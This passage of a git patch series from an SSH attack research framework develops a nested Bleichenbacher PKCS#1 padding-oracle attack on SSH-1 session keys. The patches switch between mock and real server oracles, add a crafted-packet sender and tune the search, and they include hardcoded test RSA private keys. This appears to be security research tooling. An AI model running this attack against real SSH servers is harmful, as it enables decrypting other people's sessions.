+434,8 @@ public void executeAttack() { + " \"Inner-Tries\": \"%d\"," + " \"Outer-Tries\": \"%d\"," + " \"serverkey_lenght\": \"%d\"," - + " \"hostkey_lenght\": \"%d\"" + + " \"hostkey_lenght\": \"%d\"," + + " \"oracle_type\": \"strong\"" + "}", ArrayConverter.bytesToHexString(solutionByteArray), ArrayConverter.bytesToHexString(encryptedSecret), diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java index d7d80cef0..f98ca26f6 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -211,7 +211,7 @@ private boolean[] oracleWeak(byte[] msg) { */ @Override public boolean[] checkDoublePKCSConformity(byte[] msg) { - /// return oracleWeak(msg); + // return oracleWeak(msg); return oracleStrong(msg); } From 006c820d9f06b7a69bca2f836c82a94aba7a58de Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Wed, 6 Dec 2023 15:49:38 +0100 Subject: [PATCH 115/176] Switching from MOCK to Real oracle --- .../attacks/impl/BleichenbacherAttacker.java | 43 +++++++------------ .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 4 +- 2 files changed, 18 insertions(+), 29 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 0f197668c..6f3c68ecd 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -15,13 +15,12 @@ import de.rub.nds.sshattacker.attacks.general.KeyFetcher; import de.rub.nds.sshattacker.attacks.general.ParallelExecutor; import de.rub.nds.sshattacker.attacks.pkcs1.*; -import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Ssh1MockOracle; +import de.rub.nds.sshattacker.attacks.pkcs1.oracles.BleichenbacherOracle; import de.rub.nds.sshattacker.attacks.response.EqualityError; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.exceptions.CryptoException; @@ -29,7 +28,6 @@ import java.io.FileOutputStream; import java.io.IOException; import java.math.BigInteger; -import java.security.InvalidKeyException; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import java.security.interfaces.RSAPublicKey; @@ -37,7 +35,6 @@ import java.util.Arrays; import java.util.List; import java.util.Random; -import javax.crypto.NoSuchPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -243,7 +240,7 @@ public void executeAttack() { + "871890105EFFE1193F", 16));*/ - // Host 1024 + /*// Host 1024 CustomRsaPublicKey hostPublicKey = new CustomRsaPublicKey( new BigInteger("010001", 16), @@ -314,16 +311,15 @@ public void executeAttack() { + "27DB0768AB643AD09A7C42C6AD47DA" + "ACE6CD53C051E26E69AF472D0CFE17" + "322EC96499E529", - 16)); + 16));*/ /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; }*/ - /*getPublicKeys(); - getHostPublicKey(); - getServerPublicKey(); - */ + getPublicKeys(); + getHostPublicKey(); + getServerPublicKey(); byte[] encryptedSecret; if (config.isBenchmark()) { LOGGER.info("Running in Benchmark Mode, generating encrypted Session Key"); @@ -331,11 +327,6 @@ public void executeAttack() { Random random = new Random(); byte[] sessionKey = new byte[32]; random.nextBytes(sessionKey); - /* - - ArrayConverter.hexStringToByteArray( - "d8e96a8f2facb6536f078bcee655df3bffcc4da14c45c35d6e66813a097867f6"); - */ AbstractCipher innerEncryption; AbstractCipher outerEncryption; @@ -374,22 +365,22 @@ public void executeAttack() { throw new RuntimeException(e); } - Ssh1MockOracle oracle = null; + /* Ssh1MockOracle oracle = null; try { oracle = new Ssh1MockOracle( hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey); } catch (NoSuchPaddingException | NoSuchAlgorithmException | InvalidKeyException e) { throw new RuntimeException(e); - } + }*/ - /*BleichenbacherOracle oracle = - new BleichenbacherOracle( - this.hostPublicKey, - this.serverPublicKey, - getSshConfig(), - counterInnerBleichenbacher, - counterOuterBleichenbacher);*/ + BleichenbacherOracle oracle = + new BleichenbacherOracle( + this.hostPublicKey, + this.serverPublicKey, + getSshConfig(), + counterInnerBleichenbacher, + counterOuterBleichenbacher); Bleichenbacher attacker = new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); @@ -408,8 +399,6 @@ public void executeAttack() { attacker.getCounterOuterBleichenbacher()); BigInteger solution = attacker.getSolution(); - // Trasfer big-Integer back to byte-array, remove leading 0 if present. - byte[] solutionByteArray = ArrayConverter.bigIntegerToByteArray(solution); CONSOLE.info("Decoded Solution: " + ArrayConverter.bytesToHexString(solutionByteArray)); @@ -435,7 +424,7 @@ public void executeAttack() { + " \"Outer-Tries\": \"%d\"," + " \"serverkey_lenght\": \"%d\"," + " \"hostkey_lenght\": \"%d\"," - + " \"oracle_type\": \"strong\"" + + " \"oracle_type\": \"real\"" + "}", ArrayConverter.bytesToHexString(solutionByteArray), ArrayConverter.bytesToHexString(encryptedSecret), diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java index f98ca26f6..43447e261 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -211,8 +211,8 @@ private boolean[] oracleWeak(byte[] msg) { */ @Override public boolean[] checkDoublePKCSConformity(byte[] msg) { - // return oracleWeak(msg); - return oracleStrong(msg); + return oracleWeak(msg); + // return oracleStrong(msg); } private byte[] fillUpArray(int lenght, byte[] inputArray) { From cedd2050fa879ec877e402fc7b0320f38c2af84b Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 28 Dec 2023 21:34:36 +0100 Subject: [PATCH 116/176] Improving Bleichenbach Implementation --- .../attacks/impl/BleichenbacherAttacker.java | 86 +++++++++-- .../attacks/pkcs1/Bleichenbacher.java | 137 +++++++++++------- .../BleichenbacherWorkflowGenerator.java | 1 - .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 4 +- .../core/crypto/ec/EllipticCurve.java | 7 +- 5 files changed, 169 insertions(+), 66 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 6f3c68ecd..e3ed1d5b6 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -15,19 +15,27 @@ import de.rub.nds.sshattacker.attacks.general.KeyFetcher; import de.rub.nds.sshattacker.attacks.general.ParallelExecutor; import de.rub.nds.sshattacker.attacks.pkcs1.*; -import de.rub.nds.sshattacker.attacks.pkcs1.oracles.BleichenbacherOracle; +import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Ssh1MockOracle; import de.rub.nds.sshattacker.attacks.response.EqualityError; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.state.State; +import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; +import de.rub.nds.sshattacker.core.workflow.WorkflowExecutor; +import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; +import de.rub.nds.sshattacker.core.workflow.action.GenericReceiveAction; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; import java.math.BigInteger; +import java.security.InvalidKeyException; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import java.security.interfaces.RSAPublicKey; @@ -35,6 +43,7 @@ import java.util.Arrays; import java.util.List; import java.util.Random; +import javax.crypto.NoSuchPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -144,8 +153,32 @@ private void getPublicKeys() { LOGGER.info("Recived keys"); } + private String sendSinglePacket(byte[] msg) { + + Config sshConfig = getSshConfig(); + sshConfig.setWorkflowExecutorShouldClose(false); + WorkflowTrace trace = BleichenbacherWorkflowGenerator.generateWorkflow(sshConfig, msg); + + GenericReceiveAction receiveOracleResultAction = new GenericReceiveAction(); + trace.addSshAction(receiveOracleResultAction); + + State state = new State(sshConfig, trace); + WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); + workflowExecutor.executeWorkflow(); + + ProtocolMessage lastMessage = receiveOracleResultAction.getReceivedMessages().get(0); + LOGGER.debug("Received: {}", lastMessage.toString()); + System.exit(0); + return lastMessage.toString(); + } + @Override public void executeAttack() { + byte[] msg = new byte[100]; + msg = + ArrayConverter.hexStringToByteArray( + "12CE7501BDDC7AF798644ACB351A37A90F31FB0E0CF0D9C18BE14FAB0CF0F4F42689F13C06370A477E764E0CA64DEC2F7A12ABFFBDE3058901D9A3CC453B72C7BEB059BAF394F642A0EE5AE5D4AC6BA775C23E9ADBE5338E8896AB521525979C98AC993C5F5C8F1D35DEA7EBD22BB485E925B8E50C9258C00673B96733F29D16"); + LOGGER.info(sendSinglePacket(msg)); if (config.isBenchmark()) { try { @@ -161,6 +194,38 @@ public void executeAttack() { } } + // Test + // Host 2048 + CustomRsaPrivateKey hostPrivatKey = + new CustomRsaPrivateKey( + new BigInteger( + "36BDABD4DC5CE64FAF60420BE9DB5D534CB1A5D7E4BE3BC455B71907EE5C9B69F6DCA7D326DFFD352E11BE3A02BFF5F801F97C54A813D373EE23D86374C4D5F010C2A964FF2945B3D988B1337B713F5831DA28C30D3A5986DAF6E7F7E4F4775957A3CBFBAEAE84E3A0A2AFE1D59C293903D2B39852C82AEB7B23ED0704D1FE69", + 16), + new BigInteger( + "AB81705A90C69618E388795B521C2353E7E0B37B133D7780593C068C3E39D5D57CD67F07E3D76B3EF8213E2494732579223644A88CE48E5A3D6EEF208B20CEA5F50A99D42B0A915C765654175D35C9BC4DBC4432B499D890ED79315BAB7B3485595154A87F2F040B8ACC654A93A9C51F418163BDB3A2D57A092F7FBC10B4BF1D", + 16)); + CustomRsaPublicKey hostPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "AB81705A90C69618E388795B521C2353E7E0B37B133D7780593C068C3E39D5D57CD67F07E3D76B3EF8213E2494732579223644A88CE48E5A3D6EEF208B20CEA5F50A99D42B0A915C765654175D35C9BC4DBC4432B499D890ED79315BAB7B3485595154A87F2F040B8ACC654A93A9C51F418163BDB3A2D57A092F7FBC10B4BF1D", + 16)); + // Server 1024 + CustomRsaPrivateKey serverPrivateKey = + new CustomRsaPrivateKey( + new BigInteger( + "ABE6304FAE535001BBFA94474FA4178C012058518A93805A25EFD56932C365724B422CDE3EE038243367AE3C57876CE297E66531B2F027B1407DE77758200761FFE5F96360BE21DDB7ECAD61523319A8DAA65B5F00CF52F0DB2F3A2A929EDA11", + 16), + new BigInteger( + "CC8E8480EB2E26580EA260146575CB10D215F71A46BBB62C98D854154579E372E193102FF359799C4D247A661F32C082EE5C1919B43889214C8310E6291E2B0B16818464BAE5A0374CACA0EB4814756B71C3E1F459AB4B8DE555D338CA30557F", + 16)); + CustomRsaPublicKey serverPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "CC8E8480EB2E26580EA260146575CB10D215F71A46BBB62C98D854154579E372E193102FF359799C4D247A661F32C082EE5C1919B43889214C8310E6291E2B0B16818464BAE5A0374CACA0EB4814756B71C3E1F459AB4B8DE555D338CA30557F", + 16)); + /*// Host 2048 CustomRsaPrivateKey hostPrivatKey = new CustomRsaPrivateKey( @@ -365,23 +430,22 @@ public void executeAttack() { throw new RuntimeException(e); } - /* Ssh1MockOracle oracle = null; + Ssh1MockOracle oracle = null; try { oracle = new Ssh1MockOracle( hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey); } catch (NoSuchPaddingException | NoSuchAlgorithmException | InvalidKeyException e) { throw new RuntimeException(e); - }*/ - - BleichenbacherOracle oracle = - new BleichenbacherOracle( - this.hostPublicKey, - this.serverPublicKey, - getSshConfig(), - counterInnerBleichenbacher, - counterOuterBleichenbacher); + } + /* BleichenbacherOracle oracle = + new BleichenbacherOracle( + this.hostPublicKey, + this.serverPublicKey, + getSshConfig(), + counterInnerBleichenbacher, + counterOuterBleichenbacher);*/ Bleichenbacher attacker = new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 52fbdadf5..2921aa2f6 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -57,22 +57,22 @@ public Bleichenbacher( } /** - * Divides a / b, returns the down-rounded result. + * Calculates the floor division of two BigInteger numbers. * - * @param a The BigInt which gets divided - * @param b The BigInt which is the divider - * @return Down-rounded division-result + * @param a The BigInteger number to be divided. + * @param b The BigInteger number that is the divisor. + * @return The floor division of a by b as a BigInteger. */ private BigInteger floor(BigInteger a, BigInteger b) { return a.divide(b); } /** - * Divides a / b, returns the up-rounded result. + * Divides a BigInteger number 'a' by another BigInteger number 'b' and returns the ceiling of the result. * - * @param a The BigInt which gets divided - * @param b The BigInt which is the divider - * @return Up-rounded division-result + * @param a The BigInteger number to be divided + * @param b The BigInteger number that is the divisor + * @return The ceiling of the division result */ private BigInteger ceil(BigInteger a, BigInteger b) { BigInteger c = a.mod(b); @@ -83,6 +83,19 @@ private BigInteger ceil(BigInteger a, BigInteger b) { } } + /** + * Manipulates the ciphertext by performing the following steps: + * 1. Computes the exponentiated value of s using the public exponent e and modulus n. + * 2. Converts the ciphertext array c to a BigInteger cipher. + * 3. Multiplies cipher with exponentiated and stores the result in res. + * 4. Computes the modulus of res with n and returns the result. + * + * @param s The value to be exponentiated. + * @param e The public exponent. + * @param n The modulus. + * @param c The ciphertext as a byte array. + * @return The manipulated ciphertext as a BigInteger. + */ private BigInteger manipulateCiphertext(BigInteger s, BigInteger e, BigInteger n, byte[] c) { BigInteger exponentiated = s.modPow(e, n); BigInteger cipher = new BigInteger(1, c); @@ -122,9 +135,19 @@ private BigInteger find_smallest_s( ciphertext); boolean oracleResult = queryOracle(attempt, false); + + if (counterOuterBleichenbacher == 0) { + LOGGER.fatal( + ArrayConverter.bytesToHexString( + ArrayConverter.bigIntegerToByteArray(attempt))); + } counterOuterBleichenbacher++; if (oracleResult) { + LOGGER.fatal( + ArrayConverter.bytesToHexString( + ArrayConverter.bigIntegerToByteArray(attempt))); + // System.exit(0); return s; } s = s.add(BigInteger.ONE); @@ -147,8 +170,8 @@ private BigInteger find_smallest_s_nested( CustomRsaPublicKey rsaPublicKey, CustomRsaPublicKey outerKey) { BigInteger s = lowerBound; - LOGGER.debug("Searching for smallest s, beginning at: {}", lowerBound.toString(16)); - LOGGER.debug("Ciphertext: {}", bytesToHex(ciphertext)); + // LOGGER.debug("Searching for smallest s, beginning at: {}", lowerBound.toString(16)); + // LOGGER.debug("Ciphertext: {}", bytesToHex(ciphertext)); while (true) { // (c * pow(s,e,n)) % n @@ -165,6 +188,9 @@ private BigInteger find_smallest_s_nested( counterInnerBleichenbacher++; if (oracleResult) { + LOGGER.fatal( + ArrayConverter.bytesToHexString( + ArrayConverter.bigIntegerToByteArray(encryptedAttempt))); LOGGER.debug("Found smallest s: {}", s); return s; } @@ -192,10 +218,10 @@ private BigInteger find_s_in_range_nested( byte[] ciphertext, CustomRsaPublicKey rsaPublicKey, CustomRsaPublicKey outerKey) { - LOGGER.debug( - "Searching for s in range from {} to {}", - lowerBound.toString(16), - upperBound.toString(16)); + /* LOGGER.debug( + "Searching for s in range from {} to {}", + lowerBound.toString(16), + upperBound.toString(16));*/ // ri = ceil(2 * (b * prev_s - 2 * B), n) BigInteger bTimesPrevs = upperBound.multiply(previousS); @@ -257,10 +283,12 @@ private BigInteger find_s_in_range( BigInteger previousS, byte[] ciphertext, CustomRsaPublicKey rsaPublicKey) { - LOGGER.debug( - "Searching for s in range from {} to {}", - lowerBound.toString(16), - upperBound.toString(16)); + /* + LOGGER.debug( + "Searching for s in range from {} to {}", + lowerBound.toString(16), + upperBound.toString(16)); + */ // ri = ceil(2 * (b * prev_s - 2 * B), n) BigInteger bTimesPrevs = upperBound.multiply(previousS); @@ -320,12 +348,12 @@ static List safeIntervalInsert(List M, Interval intervalToIn BigInteger lb = chosenInterval.lower.min(intervalToInsert.lower); BigInteger ub = chosenInterval.upper.max(intervalToInsert.upper); M.set(i, new Interval(lb, ub)); - LOGGER.debug( - "Overlap found, inserting lowerBound: {} upperboudn: {} into new M [{}] = {}", - lb.toString(16), - ub.toString(16), - i, - M.toString()); + /* LOGGER.debug( + "Overlap found, inserting lowerBound: {} upperboudn: {} into new M [{}] = {}", + lb.toString(16), + ub.toString(16), + i, + M.toString());*/ return M; } } @@ -354,23 +382,25 @@ private List updateInterval( BigInteger r_lower = ceil(lowerPartForCeil, rsaPublicKey.getModulus()); - LOGGER.debug( - "found r_lower: {} from lowerPartForCeil: {}", - r_lower.toString(16), - lowerPartForCeil.toString(16)); - + /* LOGGER.debug( + "found r_lower: {} from lowerPartForCeil: {}", + r_lower.toString(16), + lowerPartForCeil.toString(16)); + */ /* b * s - 2 * B */ BigInteger upperTimesS = chosenInterval.upper.multiply(s); BigInteger upperPartForCeil = upperTimesS.subtract(two_B); BigInteger r_upper = ceil(upperPartForCeil, rsaPublicKey.getModulus()); - LOGGER.debug( - "found r_upper: {} from upperPartForCeil: {}", - r_upper.toString(16), - upperPartForCeil.toString(16)); + /* + LOGGER.debug( + "found r_upper: {} from upperPartForCeil: {}", + r_upper.toString(16), + upperPartForCeil.toString(16)); - LOGGER.debug("Compare:{}", r_lower.compareTo(r_upper)); + LOGGER.debug("Compare:{}", r_lower.compareTo(r_upper)); + */ for (BigInteger r = r_lower; r.compareTo(r_upper) < 0; r = r.add(BigInteger.ONE)) { BigInteger lowerBound = chosenInterval.lower; @@ -379,24 +409,24 @@ private List updateInterval( BigInteger lowerUpperBound = ceil(two_B.add(r.multiply(rsaPublicKey.getModulus())), s); lowerBound = lowerBound.max(lowerUpperBound); - LOGGER.debug("found lowerBound: {}", lowerBound.toString(16)); + // LOGGER.debug("found lowerBound: {}", lowerBound.toString(16)); BigInteger upperUpperBound = floor(three_B_sub_one.add(r.multiply(rsaPublicKey.getModulus())), s); upperBound = upperBound.min(upperUpperBound); - LOGGER.debug("found upperBound: {}", upperBound.toString(16)); + // LOGGER.debug("found upperBound: {}", upperBound.toString(16)); Interval interim_interval = new Interval(lowerBound, upperBound); - LOGGER.debug( - "new Interval to insert lower: {} upper: {}", - interim_interval.lower.toString(16), - interim_interval.upper.toString(16)); - + /*LOGGER.debug( + "new Interval to insert lower: {} upper: {}", + interim_interval.lower.toString(16), + interim_interval.upper.toString(16)); + */ M_new = safeIntervalInsert(M_new, interim_interval); - LOGGER.debug( - "safeinserting in M_new lower: {} M upper: {}", - M_new.get(0).lower.toString(16), - M_new.get(0).upper.toString(16)); + /*LOGGER.debug( + "safeinserting in M_new lower: {} M upper: {}", + M_new.get(0).lower.toString(16), + M_new.get(0).upper.toString(16));*/ } } @@ -447,13 +477,14 @@ private byte[] nestedBleichenbacher( three_B_sub_one = three_B.subtract(BigInteger.ONE); three_B_plus_one = three_B.add(BigInteger.ONE); - LOGGER.debug("Starting with outer BB {} ", ArrayConverter.bytesToHexString(ciphertext)); + // LOGGER.debug("Starting with outer BB {} ", ArrayConverter.bytesToHexString(ciphertext)); byte[] encoded_inner_ciphertext = bleichenbacher(ciphertext, outerPublicKey); - LOGGER.debug("got inner BB {}", ArrayConverter.bytesToHexString(ciphertext)); + // LOGGER.debug("got inner BB {}", ArrayConverter.bytesToHexString(ciphertext)); byte[] innerCiphertext = pkcs1Decode(encoded_inner_ciphertext); - LOGGER.debug("Decoded inner BB into {}", ArrayConverter.bytesToHexString(innerCiphertext)); + // LOGGER.debug("Decoded inner BB into {}", + // ArrayConverter.bytesToHexString(innerCiphertext)); - LOGGER.debug("Switching to inner Ciphertext, cracked outer successful"); + // LOGGER.debug("Switching to inner Ciphertext, cracked outer successful"); B = big_two.pow(8 * (innerK - 2)); two_B = B.multiply(big_two); @@ -464,6 +495,14 @@ private byte[] nestedBleichenbacher( return innerBleichenbacher(innerCiphertext, innerPublicKey, outerPublicKey); } + /** + * Perform the inner Bleichenbacher algorithm. + * + * @param ciphertext The ciphertext to decrypt. + * @param innerPublicKey The inner RSA public key. + * @param outerPublicKey The outer RSA public key. + * @return The decrypted plaintext as a byte array. + */ private byte[] innerBleichenbacher( byte[] ciphertext, CustomRsaPublicKey innerPublicKey, diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java index bcc90ee1d..08ca99bbd 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java @@ -47,7 +47,6 @@ public static WorkflowTrace generateWorkflow(Config sshConfig, byte[] encryptedS return trace; } - /** * Generates a dynamic workflow that encrypts the given encoded secret during execution * diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java index 43447e261..f98ca26f6 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -211,8 +211,8 @@ private boolean[] oracleWeak(byte[] msg) { */ @Override public boolean[] checkDoublePKCSConformity(byte[] msg) { - return oracleWeak(msg); - // return oracleStrong(msg); + // return oracleWeak(msg); + return oracleStrong(msg); } private byte[] fillUpArray(int lenght, byte[] inputArray) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/ec/EllipticCurve.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/ec/EllipticCurve.java index 3cac16eb2..3c44de77e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/ec/EllipticCurve.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/ec/EllipticCurve.java @@ -137,14 +137,15 @@ public Point inverse(Point p) { * * @param x The x coordinate of the point. * @param y The y coordinate of the point. + * @return The Point object with the given coordinates. */ public abstract Point getPoint(BigInteger x, BigInteger y); /** - * Returns true iff the point p is on the curve. + * Determines whether a given point is on the curve. * - * @param p An affine point whose coordinates are elements of the field over which the curve is - * defined or the point at infinity. + * @param p The point to check. + * @return True if the point is on the curve, false otherwise. */ public abstract boolean isOnCurve(Point p); From c255b78ac506ce9488bc9a193a0cb1cf2153d741 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 28 Dec 2023 21:43:42 +0100 Subject: [PATCH 117/176] Implementing Bardou-Recommondation smaller start array --- .../attacks/impl/BleichenbacherAttacker.java | 14 +++++------ .../attacks/pkcs1/Bleichenbacher.java | 25 +++++++++++-------- 2 files changed, 21 insertions(+), 18 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index e3ed1d5b6..f3e2bad2f 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -178,7 +178,7 @@ public void executeAttack() { msg = ArrayConverter.hexStringToByteArray( "12CE7501BDDC7AF798644ACB351A37A90F31FB0E0CF0D9C18BE14FAB0CF0F4F42689F13C06370A477E764E0CA64DEC2F7A12ABFFBDE3058901D9A3CC453B72C7BEB059BAF394F642A0EE5AE5D4AC6BA775C23E9ADBE5338E8896AB521525979C98AC993C5F5C8F1D35DEA7EBD22BB485E925B8E50C9258C00673B96733F29D16"); - LOGGER.info(sendSinglePacket(msg)); + // LOGGER.info(sendSinglePacket(msg)); if (config.isBenchmark()) { try { @@ -196,7 +196,7 @@ public void executeAttack() { // Test // Host 2048 - CustomRsaPrivateKey hostPrivatKey = + /* CustomRsaPrivateKey hostPrivatKey = new CustomRsaPrivateKey( new BigInteger( "36BDABD4DC5CE64FAF60420BE9DB5D534CB1A5D7E4BE3BC455B71907EE5C9B69F6DCA7D326DFFD352E11BE3A02BFF5F801F97C54A813D373EE23D86374C4D5F010C2A964FF2945B3D988B1337B713F5831DA28C30D3A5986DAF6E7F7E4F4775957A3CBFBAEAE84E3A0A2AFE1D59C293903D2B39852C82AEB7B23ED0704D1FE69", @@ -224,7 +224,7 @@ public void executeAttack() { new BigInteger("010001", 16), new BigInteger( "CC8E8480EB2E26580EA260146575CB10D215F71A46BBB62C98D854154579E372E193102FF359799C4D247A661F32C082EE5C1919B43889214C8310E6291E2B0B16818464BAE5A0374CACA0EB4814756B71C3E1F459AB4B8DE555D338CA30557F", - 16)); + 16));*/ /*// Host 2048 CustomRsaPrivateKey hostPrivatKey = @@ -305,7 +305,7 @@ public void executeAttack() { + "871890105EFFE1193F", 16));*/ - /*// Host 1024 + // Host 1024 CustomRsaPublicKey hostPublicKey = new CustomRsaPublicKey( new BigInteger("010001", 16), @@ -376,15 +376,15 @@ public void executeAttack() { + "27DB0768AB643AD09A7C42C6AD47DA" + "ACE6CD53C051E26E69AF472D0CFE17" + "322EC96499E529", - 16));*/ + 16)); /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; }*/ - getPublicKeys(); + /* getPublicKeys(); getHostPublicKey(); - getServerPublicKey(); + getServerPublicKey();*/ byte[] encryptedSecret; if (config.isBenchmark()) { LOGGER.info("Running in Benchmark Mode, generating encrypted Session Key"); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 2921aa2f6..4194f7071 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -68,7 +68,8 @@ private BigInteger floor(BigInteger a, BigInteger b) { } /** - * Divides a BigInteger number 'a' by another BigInteger number 'b' and returns the ceiling of the result. + * Divides a BigInteger number 'a' by another BigInteger number 'b' and returns the ceiling of + * the result. * * @param a The BigInteger number to be divided * @param b The BigInteger number that is the divisor @@ -84,11 +85,10 @@ private BigInteger ceil(BigInteger a, BigInteger b) { } /** - * Manipulates the ciphertext by performing the following steps: - * 1. Computes the exponentiated value of s using the public exponent e and modulus n. - * 2. Converts the ciphertext array c to a BigInteger cipher. - * 3. Multiplies cipher with exponentiated and stores the result in res. - * 4. Computes the modulus of res with n and returns the result. + * Manipulates the ciphertext by performing the following steps: 1. Computes the exponentiated + * value of s using the public exponent e and modulus n. 2. Converts the ciphertext array c to a + * BigInteger cipher. 3. Multiplies cipher with exponentiated and stores the result in res. 4. + * Computes the modulus of res with n and returns the result. * * @param s The value to be exponentiated. * @param e The public exponent. @@ -498,9 +498,9 @@ private byte[] nestedBleichenbacher( /** * Perform the inner Bleichenbacher algorithm. * - * @param ciphertext The ciphertext to decrypt. - * @param innerPublicKey The inner RSA public key. - * @param outerPublicKey The outer RSA public key. + * @param ciphertext The ciphertext to decrypt. + * @param innerPublicKey The inner RSA public key. + * @param outerPublicKey The outer RSA public key. * @return The decrypted plaintext as a byte array. */ private byte[] innerBleichenbacher( @@ -530,7 +530,7 @@ private byte[] innerBleichenbacher( BigInteger s = find_smallest_s_nested( - ceil(innerPublicKey.getModulus(), three_B), + ceil(innerPublicKey.getModulus().add(two_B), three_B_sub_one), 